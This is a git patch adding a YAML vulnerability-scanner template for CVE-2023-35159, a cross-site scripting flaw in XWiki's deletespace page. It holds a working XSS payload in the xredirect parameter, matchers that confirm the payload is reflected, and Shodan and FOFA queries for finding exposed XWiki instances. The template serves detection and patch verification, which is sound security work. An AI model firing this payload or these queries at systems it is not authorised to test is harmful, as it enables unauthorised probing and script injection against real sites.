From 9c513c4451f7069a30b4539cc7bb591803bac122 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 17:47:03 +0530 Subject: [PATCH] Create CVE-2023-35159.yaml --- http/cves/2023/CVE-2023-35159.yaml | 56 ++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35159.yaml diff --git a/http/cves/2023/CVE-2023-35159.yaml b/http/cves/2023/CVE-2023-35159.yaml new file mode 100644 index 0000000000..d8a0953e1c --- /dev/null +++ b/http/cves/2023/CVE-2023-35159.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35159 + +info: + name: XWiki >= 3.4-milestone-1 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain). + impact: | + Successful exploitation could lead to cross-site scripting. + remediation: | + This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1. + reference: + - https://jira.xwiki.org/browse/XWIKI-20612 + - https://nvd.nist.gov/vuln/detail/CVE-2023-35159 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35159 + cwe-id: CWE-79 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + verified: true + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)" + - "{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'javascript:alert(document.domain)' + - 'deletespace.Sandbox' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + - 401